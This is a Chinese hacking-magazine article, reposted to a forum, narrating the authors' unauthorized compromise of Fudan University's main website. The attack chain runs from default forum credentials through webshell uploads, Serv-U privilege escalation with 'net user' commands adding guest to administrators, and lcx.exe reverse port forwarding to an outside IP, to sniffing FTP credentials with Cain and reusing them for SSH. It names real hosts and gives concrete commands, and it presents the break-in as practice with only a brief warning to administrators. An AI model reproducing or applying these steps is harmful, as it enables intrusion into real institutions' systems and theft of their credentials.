此文章已發表在《黑客X檔案》第6期雜誌上

後經本文作者hackest提交到HST技術論壇

歡迎大家轉載，但請務必要記住註明此資訊！

一、師出有名

某日十分無聊，就和X論壇的超級版主wyzhack瞎吹牛，東年西扯的。後來不知道怎麼的扯到復旦去了，他提議說不如我們黑掉復旦吧。正好當時也比較清閒，就答應一起看看了，嘿嘿。這次跑去黑復旦純粹是為了練習技術。

二、戰略部署

這次要拿的是復旦主站，分站可不是我們的目標了，嘿嘿。要不然拿個分站就掛上復旦的名義似乎有點說不過去。通過google順利找到復旦大學主站：http://www.fudan.edu.cn/，

如圖1

PHP的程式，打開了個連結，順手加個單撇號，提示"警告！提交的資料

非法！"，又試了幾個其他的注入關鍵字，都被過濾掉了。看來直接從主站下手難度比較大，所以我們得想點其他辦法。這裡我打算利用嗅探來獲取目標站的重要資訊，嘿嘿。我們都知道可以根據ping一個目標地址的TTL值來大致判斷對方的伺服器作業系統！我ping了一下復旦主站，發現TTL值為53，

如圖2。

這個數值大致就是Linux的作業系統的了，嘿嘿。要想嗅探就必須要取得與目標伺服器同一網段下的某臺伺服器許可權，然後再安裝嗅探工具進行嗅探攻擊。復旦主站的IP為：61.129.42.5，那我們就必須在61.129.42.*這個網段裡先控制一臺伺服器！先用SuperScan3.0掃描整個C段的21埠，作用就是先看看有沒有windows

作業系統的伺服器在這個網段裡！至於為什麼要掃21嘛，大家都清楚要是裝了Serv-U的話要是沒什麼意外，提權應該是比較容易的嘛，嘿嘿。掃描結果出來了，有好幾臺裝有Serv-U的，按經驗，裝了Serv-U的就肯定是windows系統的了！IP為61.129.42.42這臺明顯就是windows的系統，Serv-U的版本是6.3的，

如圖3。

三、步步為營

現在目的很明確，就是要先控制住61.129.42.42這臺伺服器！在瀏覽器裡面填入IP訪問，發現頁面有點難看，都是些doc文件下載的東西，對我們來說沒什麼用。我們可以通過查詢域名繫結看看有些什麼站在上面。我一般不用明小子查詢，因為用它能查出來的已經很少了！用X以前介紹過的一個網站來查詢吧，它查出來的比明小子查的資料要多且準！開啟http://www.seologs.com/ip-domains.html，在"Domain or IP address"裡填上"61.129.42.42"，然後點選"submit"提交，稍等一會就會返回查詢結果的了，

如圖4。

只有兩個，似乎不容樂觀哦。居然開啟兩個都不能訪問！後來訪問了一下8000端口才有反應了，

如圖5。光在這裡面也看不出什麼來，頁面比較簡單，可利用的地方不多。值得慶幸的是有個"線上論壇"，開啟看看，原來是動網的，嘿嘿。用預設的使用者名稱和密碼嘗試登入，居然成功了進入了後臺，

如圖6。本以為可以很輕鬆的拿到webshell的，沒想到這個破論壇既不能上傳也不能備份！動網沒了這兩個功能基本上比較難拿到webshell了，鬱悶！於是又上了邪惡八進位制發帖討論，沒多久就在回覆裡面看到動網還有個後臺列檔案的漏洞！嘿嘿，這回似乎又有得搞了！大致方法就是在"基本設定"裡修改"上傳目錄設定"，然後到"上傳檔案管理"裡面去檢視結果。

列了N久終於發現有可利用的東西了，

如圖7。ewebeditor出現了，嘿嘿。點選開啟後臺登入頁面，

如圖8。嘗試預設的使用者名稱和密碼發現無法登入進去，看來密碼改過了。沒關係，反正我們能列檔案嘛。再利用動網列檔案的漏洞找到了ewebeditor的資料庫檔案，下載回來，用明小子的資料庫管理功能開啟，查看了管理員密碼的MD5雜湊，

如圖9。

再到MD5查詢網站查詢密碼，幸運的是密碼並不複雜，順利查了出來，

如圖10。用得到的使用者名稱和密碼成功登入了ewebeditor的後臺，

如圖11。進了ewebeditor拿webshell就比較輕鬆的了。樣式管理-拷貝樣式-設定-新增允許上傳型別asa，再預覽上傳asa字尾的ASP馬，然後在"上傳檔案管理"裡就可以看到馬的了，點選直接訪問webshell，

如圖12。在圖12裡面，我們可以看到有ASPNET這個使用者，一般來說很有可能支援ASPX，因為ASPX馬的許可權一般要比ASP的高。所以我上傳了一個ASPX馬。然後再傳了一個SU提權的ASP馬，執行："net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三條命令，意思是先啟用guest使用者，再給guest使用者設定一個密碼，再把guest使用者新增進管理員組。幸運的是Serv-U的預設連線密碼沒有改，命令都成功執行了。在ASPX馬裡執行："net user guest"我們可以發現guest已經隸屬於管理員組了，

如圖13。用ASPX馬讀取了登錄檔的遠端桌面服務埠，發現就是預設的3389，不過Terminal Services服務當時是沒有開的。後來wyzhack放了鴿子才給開了，嘿嘿。

四、守株待兔

直接連線3389是行不通的，防火牆把我們擋在了外面。不過我們可以用lcx.exe給它來個埠轉發。直接用ASPX馬或者SU提權馬發現都不能執行lcx.exe進行轉發，所以我想通過修改Serv-U的配置檔案來新增一個具體system許可權的FTP使用者，再登入上去進行埠轉發。就是修改C:\Program Files\Serv-U\ServUDaemon.ini這個檔案的內容啦。如何修改我就不廢話了，有興趣的話大家可以去了解下SU配置檔案的存放規則，瞭解之後修改起來就得心應手的了。我就添加了一個使用者名稱為hackest的，擁有system許可權的FTP使用者。要是配置檔案沒有許可權修改的話，可以用SU提權馬執行cacls.exe修改檔案屬性為everyone完全控制就可以修改的了，不過cacls.exe需要檔案格式為NTFS的才可以使用哦。在CMD下登入FTP上去，執行：

C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389

本機執行：

lcx.exe -listen 51 2007

然後連線本機的的2007埠就可以登入遠端伺服器了，

如圖14。到這裡我們就已經成功控制了61.129.42.42這臺伺服器。接下來就是安裝cain進行嗅探了，具體請參照我的另一篇關於嗅探入侵的文章。在61.129.42.42上執行"ipconfig /all"命令得知預設閘道器為61.129.42.1，

如圖15。復旦主站的IP為：61.129.42.5。設定好cain就可以開始嗅探攻擊了，嘿嘿。由於一開始的那幾天是五一假期時間，嗅了兩天一無所獲。N天之後終於有進展了，wyzhack告訴我已經成功嗅探到復旦主站的FTP使用者名稱和密碼了，

如圖16。

對於一個網站，有了FTP密碼就等於有了一切！利用FTP上傳了一個PHP馬，進去參觀一下，

如圖17。

五、塵埃落定

到這裡就已經完全控制了復旦大學的主站了！雖然主站的作業系統是Linux，但是我們通過先控制一臺windows的3389肉雞再進行對目標的嗅探攻擊收到了如期的效果。可見嗅探攻擊的威力的確非比尋常，不注意這方面的防範也必將被人惡意入侵！既然是Linux的系統，管理員一般都是用SSL來遠端管理伺服器的，嘿嘿。掃描一下主站伺服器，發現開了22埠（SSL的預設連線埠為22）嘗試用嗅到的FTP使用者名稱和密碼登入SSL居然成功了，

如圖18。至於通過溢位或者其他提權方法來得到root許可權，我就不弄了，因為這方面實在不太熟悉。本文主要是介紹一種入侵思路，沒有什麼技術含量。不得不說的一句話：管理員們要小心嗅探攻擊了，嗅探的攻擊力可是比較厲害的。如有不妥之處還請大家批評斧正！